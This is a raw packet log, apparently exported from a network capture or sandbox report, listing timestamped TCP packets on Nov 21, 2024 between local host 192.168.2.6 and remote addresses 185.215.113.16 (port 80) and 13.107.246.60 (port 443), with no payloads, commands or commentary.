                                                                                                                                                                        Nov 21, 2024 10:37:49.157664061 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.157705069 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.158492088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.158587933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.158627033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.159452915 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.159542084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.159576893 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.160303116 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.160396099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.161227942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.161272049 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.161349058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.161395073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.162209034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.162295103 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.162334919 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.163135052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.163228035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.163271904 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.163980007 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.164103985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.164249897 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.164930105 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.165046930 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.165100098 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.165857077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.165934086 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.166124105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.166769028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.166934967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.167016029 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.167701006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.167799950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.167833090 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.168598890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.168642998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.168687105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.169498920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.169625044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.169667006 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.170444012 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.170592070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.170728922 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.171375990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.171608925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.171710968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.172285080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.172413111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.172447920 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.173207045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.173316002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.173357964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.174139977 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.174273968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.174357891 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.175086975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.175152063 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.175297976 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.175971031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.176095009 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.176322937 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.176903963 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.176923990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.176966906 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.177819014 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.177927017 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.177972078 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.178731918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.182588100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.329557896 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.329631090 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.329696894 CET49794443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.329950094 CET49794443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.329967976 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.329977989 CET49794443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.329983950 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.331957102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.332063913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.332129002 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.332241058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.332375050 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.332387924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.332410097 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.332429886 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.332461119 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.332592964 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.332604885 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.333189011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.333417892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.333472967 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.334105968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.334280014 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.334327936 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.335016966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.335184097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.335227966 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.335994959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.336074114 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.336146116 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.336852074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.336972952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.337014914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.337795973 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.337929964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.337975025 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.338697910 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.338809967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.338855982 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.339690924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.339771032 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.339812994 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.340576887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.340718985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.340854883 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.341465950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.341548920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.341590881 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.342427969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.342477083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.342518091 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.343319893 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.343441010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.343497038 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.344206095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.344341040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.344383955 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.345160961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.345307112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.345351934 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.346065998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.346190929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.346245050 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.346981049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.347040892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.347124100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.347927094 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.348026991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.348073006 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.348845005 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.348954916 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.348994970 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.349881887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.349950075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.349993944 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.350090981 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.350697041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.350759029 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.351010084 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.351022005 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.351676941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.351831913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.351875067 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.352524042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.352669954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.352714062 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.353457928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.353610039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.354407072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.354425907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.354454041 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.354476929 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.355271101 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.355432034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.355551958 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.356214046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.356312990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.356344938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.356384039 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.356781006 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.356844902 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.357165098 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.357209921 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.357245922 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.357274055 CET49795443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.357290030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.357316017 CET49795443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.357331991 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.357346058 CET49795443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.357352018 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.358035088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.358114004 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.358175993 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.358263016 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.359095097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.359219074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.359436035 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.360115051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.360272884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.360423088 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.360441923 CET49800443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.360476017 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.360980034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.361078024 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.361109972 CET49800443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.361200094 CET49800443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.361213923 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.361234903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.361758947 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.361816883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.361869097 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.362669945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.362781048 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.362838984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.363604069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.363746881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.363811970 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.364507914 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.364597082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.364650011 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.365688086 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.365833044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.366353035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.366417885 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.366452932 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.367300034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.367355108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.367412090 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.368211985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.368294001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.368345976 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.369180918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.369298935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.369352102 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.370038033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.370157003 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.370217085 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.370965958 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.371088028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.371601105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.371869087 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.372016907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.372788906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.372843981 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.372854948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.373768091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.373823881 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.374048948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.374635935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.374701023 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.374766111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.374799967 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.375586987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.375744104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.375802994 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.376490116 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.376748085 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.376859903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.377181053 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.377404928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.377501965 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.377545118 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.377732038 CET49797443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.377749920 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.378149986 CET49797443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.378154039 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.378339052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.378448963 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.378509998 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.379290104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.379409075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.379457951 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.380192041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.423446894 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.500683069 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.500767946 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.500993013 CET49796443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.501027107 CET49796443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.501027107 CET49796443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.501044035 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.501053095 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.503607988 CET49801443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.503639936 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.503706932 CET49801443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.504024982 CET49801443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.504038095 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.533507109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.533597946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.533637047 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.533853054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.533947945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.534039974 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.534754038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.534857035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.534907103 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.535675049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.535808086 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.535886049 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.536607027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.536721945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.536766052 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.537512064 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.537621021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.537678003 CET4978780192.168.2.6185.215.113.16
